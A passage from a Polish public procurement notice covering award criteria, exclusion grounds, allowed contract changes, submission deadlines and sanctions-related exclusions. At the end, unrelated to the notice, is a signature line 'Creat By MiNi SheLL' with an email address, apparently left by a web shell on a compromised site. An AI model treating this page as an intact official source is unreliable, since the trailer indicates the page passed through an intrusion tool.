gwarancji jakości i rękojmi sprowadzi okres gwarancji do 48 miesięcy i oceni ofertę z uwzględnieniem takiego okresu<br/>gwarancji.<br/>5. W przypadku braku zaznaczenia w formularzu ofertowym deklarowanego okresu gwarancji jakości i rękojmi Zamawiający uzna, że<br/>Wykonawca zaoferował gwarancję jakości i rękojmi na okres 24 miesięcy i oceni ofertę z uwzględnieniem takiego okresu gwarancji.<br/>6. W przypadku zaznaczenia przez Wykonawcę w formularzach ofertowych więcej niż jednego deklarowanego okresu gwarancji<br/>jakości i rękojmi, Zamawiający uzna, że Wykonawca zaoferował gwarancję jakości i rękojmi na okres najkrótszy spośród<br/>oznaczonych przez Wykonawcę terminów gwarancji jakości i rękojmi i oceni ofertę z uwzględnieniem takiego okresu gwarancji.<br/>7. Okres gwarancji jakości i rękojmi zaoferowany przez Wykonawcę w ofercie będzie wiążący na etapie realizacji zamówienia.<br/>8. Za najkorzystniejszą ofertę w danej części zamówienia zostanie uznana oferta, która otrzyma największą ilość punktów obliczoną<br/>na podstawie wzoru: Przyznana ilość punktów = PC + PG<br/>gdzie:<br/>PC - ilość punktów za kryterium „Cena”,<br/>PG - ilość punktów za kryterium „gwarancja jakości i rękojmi”.<br/>9. Jeżeli nie można wybrać najkorzystniejszej oferty z uwagi na to, że dwie lub więcej ofert przedstawia taki sam bilans ceny i innych<br/>kryteriów oceny ofert, Zamawiający wybiera spośród tych ofert ofertę, która otrzymała najwyższą ocenę w kryterium o najwyższej<br/>wadze.<br/>10. Zamawiający udzieli zamówienia Wykonawcy, którego oferta odpowiadać będzie wszystkim wymaganiom przedstawionym w<br/>ustawie, oraz w niniejszej SWZ i zostanie oceniona jako najkorzystniejsza w oparciu o podane kryteria wyboru.</span></h3> <h3 class="mb-0">4.3.2.) Sposób określania wagi kryteriów oceny ofert: <span class="normal"> Punktowo </span></h3> <h3 class="mb-0">4.3.3.) Stosowane kryteria oceny ofert: <span class="normal"> Kryterium ceny oraz kryteria jakościowe </span></h3> <h3 class="mb-0">Kryterium 1</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Cena</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">60</span></h3> <h3 class="mb-0">Kryterium 2</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: </h3> inne. <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Gwarancja jakości i rękojmi</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">40</span></h3> <h3 class="mb-0">4.3.10.) Zamawiający określa aspekty społeczne, środowiskowe lub innowacyjne, żąda etykiet lub stosuje rachunek kosztów cyklu życia w odniesieniu do kryterium oceny ofert: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA V - KWALIFIKACJA WYKONAWCÓW</h2> <h3 class="mb-0">5.1.) Zamawiający przewiduje fakultatywne podstawy wykluczenia: <span class="normal">Tak</span></h3> <h3 class="mb-0">5.2.) Fakultatywne podstawy wykluczenia: </h3> <p class="mb-0">Art. 109 ust. 1 pkt 4</p> <p class="mb-0">Art. 109 ust. 1 pkt 5</p> <p class="mb-0">Art. 109 ust. 1 pkt 7</p> <h3 class="mb-0">5.3.) Warunki udziału w postępowaniu: <span class="normal">Nie</span></h3> <h3 class="mb-0">5.5.) Zamawiający wymaga złożenia oświadczenia, o którym mowa w art.125 ust. 1 ustawy: <span class="normal">Tak</span></h3> <h3 class="mb-0"> 5.6.) Wykaz podmiotowych środków dowodowych na potwierdzenie niepodlegania wykluczeniu: <span class="normal">1. Zamawiający w celu<br/>potwierdzenia braku podstaw wykluczenia Wykonawcy z udziału w postępowaniu na podstawie art. 109 ust. 1 pkt 4) ustawy Pzp<br/>będzie wymagał złożenia:<br/>a) odpisu lub informacji z Krajowego Rejestru Sądowego lub Centralnej Ewidencji i Informacji o Działalności Gospodarczej, w<br/>zakresie art. 109 ust. 1 pkt 4) ustawy Pzp, sporządzonych nie wcześniej niż 3 miesiące przed jej złożeniem, jeżeli odrębne przepisy<br/>wymagają wpisu do rejestru lub ewidencji.<br/>Zamawiający w celu potwierdzenia braku podstaw wykluczenia Wykonawcy z udziału w postępowaniu na podstawie art. 109 ust. 1<br/>pkt 4) ustawy Pzp skorzysta z dokumentów znajdujących się w ogólnodostępnych i bezpłatnych bazach danych pod warunkiem<br/>wskazania przez Wykonawcę w oświadczeniu o którym mowa w Rozdziale VII ust. 1 SWZ (Załącznik nr 3 do SWZ), danych<br/>umożliwiających dostęp do tych dokumentów.<br/>2. Jeżeli Wykonawca ma siedzibę lub miejsce zamieszkania poza granicami Rzeczypospolitej Polskiej, zamiast dokumentów, o<br/>których mowa w pkt.1 powyżej:<br/>a) składa dokument lub dokumenty wystawione w kraju, w którym Wykonawca ma siedzibę lub miejsce zamieszkania,<br/>potwierdzające odpowiednio, że:<br/>- nie otwarto jego likwidacji, nie ogłoszono upadłości, jego aktywami nie zarządza likwidator lub sąd, nie zawarł układu z<br/>wierzycielami, jego działalność gospodarcza nie jest zawieszona ani nie znajduje się on w innej tego rodzaju sytuacji wynikającej z<br/>podobnej procedury przewidzianej w przepisach miejsca wszczęcia tej procedury– wystawione nie wcześniej niż 3 miesięcy przed<br/>ich złożeniem.<br/>3.Jeżeli w kraju, w którym Wykonawca ma siedzibę lub miejsce zamieszkania lub miejsce zamieszkania ma osoba, której dokument<br/>dotyczy, nie wydaje się dokumentów, o których mowa w pkt.2 powyżej, lub gdy dokumenty te nie odnoszą się do wszystkich<br/>przypadków, o których mowa w art. 108 ust 1 pkt 1, 2 i 4, art. 109 ust 1 pkt 1, 2 lit a i b oraz pkt 3 ustawy Pzp, zastępuje się je<br/>odpowiednio w całości lub części dokumentem zawierającym odpowiednio oświadczenie Wykonawcy, ze wskazaniem osoby albo<br/>osób uprawnionych do jego reprezentacji, lub oświadczenie osoby, której dokument miał dotyczyć, złożone pod przysięgą, lub, jeżeli<br/>w kraju, w którym wykonawca ma siedzibę lub miejsce zamieszkania ma osoba, której dokument miał dotyczyć, nie ma przepisów o<br/>oświadczeniu pod przysięgą, złożone przed organem sądowym lub administracyjnym, notariuszem, organem samorządu<br/>zawodowego lub gospodarczego, właściwym ze względu na siedzibę lub miejsce zamieszkania wykonawcy lub miejsce<br/>zamieszkania osoby, której dokument miał dotyczyć. Dokumenty, o których mowa w zdaniach poprzedzających powinny być<br/>wystawione nie wcześniej niż 3 miesięcy przed ich złożeniem.</span> </h3> <h3 class="mb-0"> 5.7.) Wykaz podmiotowych środków dowodowych na potwierdzenie spełniania warunków udziału w postępowaniu: <span class="normal">nie dotyczy</span> </h3> <h3 class="mb-0">5.11.) Wykaz innych wymaganych oświadczeń lub dokumentów: </h3> 1) Wypełniony i podpisany zgodnie z SWZ Formularz oferty – Załącznik nr 1 do SWZ.<br/>2) Wypełniony i podpisany zgodnie z postanowieniami SWZ formularz oferowanego wyposażenia- Załącznik nr 1a do SWZ.<br/>3) Pełnomocnictwo upoważniające do złożenia oferty, o ile ofertę składa pełnomocnik lub pełnomocnictwo dla pełnomocnika<br/>do reprezentowania w postępowaniu Wykonawców wspólnie ubiegających się o udzielenie zamówienia. <h2 class="bg-light p-3 mt-4">SEKCJA VI - WARUNKI ZAMÓWIENIA</h2> <h3 class="mb-0">6.1.) Zamawiający wymaga albo dopuszcza oferty wariantowe: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.3.) Zamawiający przewiduje aukcję elektroniczną: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.4.) Zamawiający wymaga wadium: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.5.) Zamawiający wymaga zabezpieczenia należytego wykonania umowy: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.6.) Wymagania dotyczące składania oferty przez wykonawców wspólnie ubiegających się o udzielenie zamówienia: </h3> 1)Wykonawcy mogą wspólnie ubiegać się o udzielenie zamówienia.<br/>W takim przypadku Wykonawcy ustanawiają pełnomocnika do reprezentowania ich w postępowaniu o udzielenie<br/>zamówienia albo do reprezentowania w postępowaniu i zawarcia umowy w sprawie zamówienia publicznego.<br/>2)Przepisy dotyczące Wykonawcy stosuje się odpowiednio do Wykonawców wspólnie ubiegających się o udzielenie zamówienia. <h3 class="mb-0">6.7.) Zamawiający przewiduje unieważnienie postępowania, jeśli środki publiczne, które zamierzał przeznaczyć na sfinansowanie całości lub części zamówienia nie zostały przyznane: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA VII - PROJEKTOWANE POSTANOWIENIA UMOWY</h2> <h3 class="mb-0">7.1.) Zamawiający przewiduje udzielenia zaliczek: <span class="normal">Nie</span></h3> <h3 class="mb-0">7.3.) Zamawiający przewiduje zmiany umowy: <span class="normal">Tak</span></h3> <h3 class="mb-0">7.4.) Rodzaj i zakres zmian umowy oraz warunki ich wprowadzenia: </h3> 1. Na podstawie art. 455 ust. 1 pkt 1) ustawy Pzp dopuszcza się możliwość zmian postanowień zawartej Umowy w stosunku<br/>do treści oferty, na podstawie której dokonano wyboru Wykonawcy, w następujących przypadkach:<br/>1) Zmiany sposobu wykonania przedmiotu zamówienia (w tym zmiana asortymentu) wynikające z konieczności<br/>zastosowania innych niż przewidziane w opisie przedmiotu zamówienia technologii wykonania Wyposażenia, przy czym<br/>możliwość i celowość wprowadzenia takich zmian musi być zaakceptowane przez Zamawiającego;<br/>2) Zamawiający dopuszcza możliwość zmiany terminu realizacji przedmiotu zamówienia w przypadku:<br/>a) wstrzymania realizacji przedmiotu zamówienia przez Zamawiającego z przyczyn niezależnych od stron, wówczas termin<br/>realizacji Umowy na wniosek Wykonawcy może ulec wydłużeniu o czas nie dłuższy niż czas przerwy;<br/>b) wydłużenia terminu wykonania robót budowlanych, adaptujących pomieszczenia, dla których dedykowane jest niniejsze<br/>zamówienie. Wówczas termin realizacji Umowy może ulec wydłużeniu o czas odpowiadający wydłużanemu terminu robót<br/>budowlanych;<br/>c) wystąpienia sił wyższych (np. powódź, trzęsienie ziemi, bunty, niepokoje, strajki itp.) niezależnych od Wykonawcy,<br/>uniemożliwiających wykonanie przedmiotu Umowy w ustalonym w umowie terminie. Wówczas termin realizacji Umowy na<br/>wniosek Wykonawcy może ulec wydłużeniu o czas niezbędny do usunięcia konsekwencji działania powyższych<br/>okoliczności;<br/>d) wystąpienia ograniczenia w dostępie do miejsca dostawy i montażu. Wówczas termin realizacji umowy na wniosek<br/>Wykonawcy może ulec wydłużeniu o czas trwania tego ograniczenia;<br/>3) ujawnienia się powszechnie występujących wad oferowanego urządzenia Zamawiający dopuszcza zmianę w zakresie<br/>przedmiotu umowy polegającą na zastąpieniu danego produktu produktem zastępczym, spełniającym wszelkie wymagania<br/>przewidziane w SWZ dla produktu zastępowanego, rekomendowanym przez producenta lub Wykonawcę w związku z<br/>ujawnieniem wad;<br/>4) zmiany materiałów i urządzeń, których użycie przewidziano w toku realizacji przedmiotu Umowy, w przypadku wycofania<br/>ich z rynku lub zakończenia ich produkcji, jak również w przypadku możliwości zastąpienia tych materiałów i urządzeń,<br/>innymi o lepszych parametrach technicznych i wyżej zaawansowanych technicznie i technologicznie;<br/>5) poprawy jakości lub innych parametrów charakterystycznych dla danego elementu dostawy lub zmiany technologii<br/>wykonania Wyposażenia na równoważną lub lepszą, podniesienia wydajności użytkowania przedmiotu Umowy oraz<br/>bezpieczeństwa;<br/>6) zmiany stawki podatku VAT spowodowanego nowelizacją ustawy o podatku od towarów i usług, wówczas zmiana<br/>wynagrodzenia Wykonawcy ulegnie zmianie o kwotę wynikającą z tej zmiany.<br/>2. Możliwość zmian postanowień zawartej Umowy w stosunku do treści oferty, na podstawie której dokonano wyboru<br/>Wykonawcy może nastąpić również w sytuacjach, o których mowa w art. 455 ust. 1 pkt 2)-4), ust.2 ustawy Pzp. <h3 class="mb-0">7.5.) Zamawiający uwzględnił aspekty społeczne, środowiskowe, innowacyjne lub etykiety związane z realizacją zamówienia: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA VIII – PROCEDURA</h2> <h3 class="mb-0">8.1.) Termin składania ofert: <span class="normal">2025-07-10 13:00</span></h3> <h3 class="mb-0">8.2.) Miejsce składania ofert: <span class="normal">https://platformazakupowa.pl/transakcja/1135923</span></h3> <h3 class="mb-0">8.3.) Termin otwarcia ofert: <span class="normal">2025-07-10 13:30</span></h3> <h3 class="mb-0">8.4.) Termin związania ofertą: <span class="normal">do 2025-08-08</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA IX – POZOSTAŁE INFORMACJE</h2> 1.Z postępowania o udzielenie zamówienia Zamawiający wykluczy również Wykonawcę, w okolicznościach wskazanych w<br/>art. 7 ust. 1 ustawy z dnia 13 kwietnia 2022 r. o szczególnych rozwiązaniach w zakresie przeciwdziałania wspieraniu agresji<br/>na Ukrainę oraz służących ochronie bezpieczeństwa narodowego– ogłoszona w dniu 15 kwietnia 2022r. (Dz.U.2025 r.<br/>poz.514) zgodnie z którym, z postępowania o udzielenie zamówienia publicznego lub konkursu prowadzonego na podstawie<br/>ustawy z dnia 11 września 2019 r. – Prawo zamówień publicznych wyklucza się:<br/>1) wykonawcę oraz uczestnika konkursu wymienionego w wykazach określonych w rozporządzeniu 765/2006 i<br/>rozporządzeniu 269/2014 albo wpisanego na listę na podstawie decyzji w sprawie wpisu na listę rozstrzygającej o<br/>zastosowaniu środka, o którym mowa w art. 1 pkt 3 ustawy z dnia 13 kwietnia 2022r. o szczególnych rozwiązaniach w<br/>zakresie przeciwdziałania wspieraniu agresji na Ukrainę oraz służących ochronie bezpieczeństwa narodowego;<br/>2) wykonawcę oraz uczestnika konkursu, którego beneficjentem rzeczywistym w rozumieniu ustawy z dnia 1 marca 2018r. o przeciwdziałaniu praniu pieniędzy oraz finansowaniu terroryzmu (Dz. U. z 2023r. poz. 1124, 1285, 1723 i 1843) jest osoba<br/>wymieniona w wykazach określonych w rozporządzeniu 765/2006 i rozporządzeniu 269/2014 albo wpisana na listę lub<br/>będąca takim beneficjentem rzeczywistym od dnia 24 lutego 2022r., o ile została wpisana na listę na podstawie decyzji w<br/>sprawie wpisu na listę rozstrzygającej o zastosowaniu środka, o którym mowa w art. 1 pkt 3 ustawy z dnia 13 kwietnia 2022r.<br/>o szczególnych rozwiązaniach w zakresie przeciwdziałania wspieraniu agresji na Ukrainę oraz służących ochronie<br/>bezpieczeństwa narodowego;<br/>3) wykonawcę oraz uczestnika konkursu, którego jednostką dominującą w rozumieniu art. 3 ust. 1 pkt 37 ustawy z dnia 29<br/>września 1994r. o rachunkowości (Dz.U. z 2023r. poz. 120, 295 i 1598) jest podmiot wymieniony w wykazach określonych w<br/>rozporządzeniu 765/2006 i rozporządzeniu 269/2014 albo wpisany na listę lub będący taką jednostką dominującą od dnia 24<br/>lutego 2022r., o ile został wpisany na listę na podstawie decyzji w sprawie wpisu na listę rozstrzygającej o zastosowaniu<br/>środka, o którym mowa w art. 1 pkt 3 ustawy z dnia 13 kwietnia 2022r. o szczególnych rozwiązaniach w zakresie<br/>przeciwdziałania wspieraniu agresji na Ukrainę oraz służących ochronie bezpieczeństwa narodowego.<br/>2.Wykluczenie następuje na okres trwania okoliczności określonych w ust. 1 ustawy z dnia 13 kwietnia 2022r. o<br/>szczególnych rozwiązaniach w zakresie przeciwdziałania wspieraniu agresji na Ukrainę oraz służących ochronie<br/>bezpieczeństwa narodowego (Dz.U.2025 r., poz.514).<br/>3. Wykonawca może zwrócić się do Zamawiającego z wnioskiem o wyjaśnienie treści SWZ. Wniosek należy złożyć, zgodnie<br/>z zapisami niniejszego Rozdziału SWZ, za pośrednictwem platformazakupowa.pl pod adresem<br/>https://platformazakupowa.pl/transakcja/1104100 za pomocą formularza “Wyślij wiadomość do zamawiającego”.<br/>Zamawiający jest obowiązany udzielić wyjaśnień niezwłocznie, jednak nie później niż na 2 dni przed upływem terminu<br/>składania ofert – pod warunkiem, że wniosek o wyjaśnienie treści SWZ wpłynął do Zamawiającego nie później niż na 4 dni<br/>przed upływem terminu składania ofert.<br/>4. W przypadku gdy wniosek o wyjaśnienie treści SWZ nie wpłynął w terminie, o którym mowa w ust.3, Zamawiający nie ma<br/>obowiązku udzielania wyjaśnień SWZ oraz obowiązku przedłużenia terminu składania ofert. Treść zapytań wraz z<br/>wyjaśnieniami Zamawiający udostępni, bez ujawniania źródła zapytania, za pośrednictwem platformazakupowa.pl, w sekcji<br/>„Komunikaty”.<br/>Zamawiający nie przewiduje zwołania zebrania Wykonawców w celu wyjaśnienia treści SWZ. W uzasadnionych<br/>przypadkach Zamawiający może przed upływem terminu składania ofert zmienić treść SWZ. Dokonaną<br/>zmianę treści SWZ Zamawiający udostępni za pośrednictwem platformazakupowa.pl, w sekcji „Komunikaty”.

Creat By MiNi SheLL
Email: jattceo@gmail.com